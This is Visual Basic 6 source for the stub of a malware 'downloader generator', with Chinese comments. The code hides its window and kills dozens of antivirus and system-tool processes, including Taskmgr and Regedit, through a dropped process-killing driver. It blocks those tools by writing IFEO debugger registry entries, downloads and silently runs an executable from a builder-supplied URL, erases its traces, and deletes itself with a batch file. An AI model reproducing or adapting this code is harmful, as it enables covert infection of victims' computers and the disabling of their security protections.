form1.frm

VB写的强大的下载者生成器源码破还原

VERSION 5.00
Begin VB.Form Form1 
   BorderStyle     =   0  'None
   Caption         =   "Form1"
   ClientHeight    =   90
   ClientLeft      =   0
   ClientTop       =   0
   ClientWidth     =   90
   Icon            =   "Form1.frx":0000
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   ScaleHeight     =   90
   ScaleWidth      =   90
   ShowInTaskbar   =   0   'False
   StartUpPosition =   3  '窗口缺省
   Visible         =   0   'False
   Begin VB.TextBox Text3 
      Height          =   375
      Left            =   600
      TabIndex        =   2
      Text            =   "IIIIIIIIIIIIIIIIII"
      Top             =   2160
      Width           =   2535
   End
   Begin VB.TextBox Text2 
      Height          =   375
      Left            =   120
      TabIndex        =   1
      Text            =   "PPPPPPPPPPPPPPPPP"
      Top             =   1560
      Width           =   1815
   End
   Begin VB.TextBox Text1 
      Height          =   375
      Left            =   0
      TabIndex        =   0
      Text            =   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
      Top             =   1080
      Width           =   4575
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'此工程为下载体部分

'模块1为进程获取pid,pid为杀进程工具参数
'模块2为声明
'资源为杀进程文件Knlps(修改)

'                -------- Made By The Ghost HunterГоТ
'> _,< 下载声明
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Public Sub DownloadFile(ByVal URL As String, ByVal LocalFilename As String)
On Error Resume Next
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
End Sub
Private Sub Kill_Main() '结束进程支线1
On Error Resume Next
Dim Kill_Num As Integer
For Kill_Num = 0 To AV_Num
Kill_Main2 (AV_Names(Kill_Num)) '把 要结束的进程名 传给 结束进程支线2
Next
End Sub
Private Sub Kill_Main2(ByVal What_To_Kill As String) '结束进程支线2
On Error Resume Next
kill_pid = GetProcessIdFromProcessName(What_To_Kill) '获得进程Pid,给支线3,结束进程
If kill_pid <= 0 Then
Exit Sub
End If
Kill_Main3 (kill_pid) '杀进程
End Sub

Private Sub Kill_Main3(ByVal What_Pid_To_Kill)
'使用杀进程工具(knlps)杀进程
On Error Resume Next
Dim SYS_Path As String
SYS_Path = Environ("windir") & "\system32\drivers\win32info.sys"
Shell SYS_Path & " -k " & What_Pid_To_Kill, vbHide
Sleep 300
End Sub

Private Sub IFEO_Kill_Main()
On Error Resume Next
Dim Kill_Num2 As Integer
For Kill_Num2 = 0 To AV_Num
IFEO_Kill_Main2 (AV_Names(Kill_Num2))
Next
End Sub
Private Sub IFEO_Kill_Main2(ByVal What_To_Kill2 As String)
'ifeo禁用
On Error Resume Next
Dim wsh
Set wsh = CreateObject("Wscript.Shell")
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" & What_To_Kill2 & "\" + "debugger", Empty_EXE_Path, "REG_SZ"
End Sub

Private Sub Form_Load()
On Error Resume Next
Dim WebPath() As String
Dim My_Path_WithOut_Name As String
My_Path_WithOut_Name = IIf(Right(App.Path, 1) = "\", App.Path, App.Path & "\")

'空文件地址,用于ifeo禁用的debug项
Empty_EXE_Path = Environ("windir") & "\system32\wscntfy.exe"

'加载杀软名称
AV_Names = Split("360safe.exe||360tray.exe||UpdaterUI.exe||avp.exe||Mcshield.exe||VsTskMgr.exe||naPrdMgr.exe||TBMon.exe||scan32.exe||CCenter.exe||RavTask.exe||Rav.exe||Ravmon.exe||RavmonD.exe||RavStub.exe||KVXP.exe||KvMonXP.exe||KVCenter.exe||KVSrvXP.exe||KRegEx.exe||kavsvc.exe||UIHost.exe||TrojDie.exe||FrogAgent.exe||kav.exe||kav32.exe||kavstart.exe||katmain.exe||kpfwsvc.exe||kpfw32.exe||rfwmain.exe||rfwproxy.exe||rfwsrv.exe||Taskmgr.exe||Regedit.exe||Msconfig.exe||360tray.exe||icesword.exe||mmc.exe||KWatch.exe||SnipeSword.exe", "||")
AV_Num = UBound(AV_Names)


'----------------------------------------------------------
If InStr(1, Text2.Text, "Kill", vbTextCompare) > 0 Then

'如果text2内有"kill"便释放杀进程文件,杀进程
Dim v
Dim v2
Dim byt() As Byte
Dim byt2() As Byte
SYS_Path_WithOut_Name = Environ("windir") & "\system32\drivers\"
 If Dir(My_Path_WithOut_Name & "kills.sys") = "" Then
 v = LoadResData(101, "CUSTOM")
 byt = v
 Open My_Path_WithOut_Name & "kills.sys" For Binary As #1
 Put #1, 1, byt()
 Close #1
 End If
 '''''''''
 If Dir(My_Path_WithOut_Name & "win32info.sys") = "" Then
 v2 = LoadResData(102, "CUSTOM")
 byt2 = v2
 Open My_Path_WithOut_Name & "win32info.sys" For Binary As #1
 Put #1, 1, byt2()
 Close #1
 End If

'对付杀软开始


Kill_Main
Kill_Main
Sleep 1000
End If
'---------------------------------------------


'---------------------------------------------
'如果text3内有ifeo字符就禁用
If InStr(1, Text3.Text, "ifeo", vbTextCompare) > 0 Then
IFEO_Kill_Main
End If
'---------------------------------------------


'++++++++++++++++++++++++++++++++++++++++++++++
'清理痕迹
Kill My_Path_WithOut_Name & "kills.sys"
Kill My_Path_WithOut_Name & "win32info.sys"
'+++++++++++++++++++++++++++++++++++++++++++++++

'+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
'杀软全杀,开始下载
'text1为下载地址,ttttt为分割
WebPath = Split(Text1.Text, "ttttt")
DownloadFile WebPath(0), My_Path_WithOut_Name & "File" & ".exe"
Shell My_Path_WithOut_Name & "File" & ".exe"
'++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



'自删除
Open My_Path_WithOut_Name & "kill.bat" For Output As #1
Print #1, ":redel"
Print #1, "del " & Chr(34) & My_Path_WithOut_Name & App.EXEName & ".exe" & Chr(34)
Print #1, "if exist " & Chr(34) & S & App.EXEName & ".exe" & Chr(34) & " goto redel"
Print #1, "del %0"
Close #1
Shell Chr(34) & S & "kill.bat" & Chr(34), vbHide
Unload Me
End


End Sub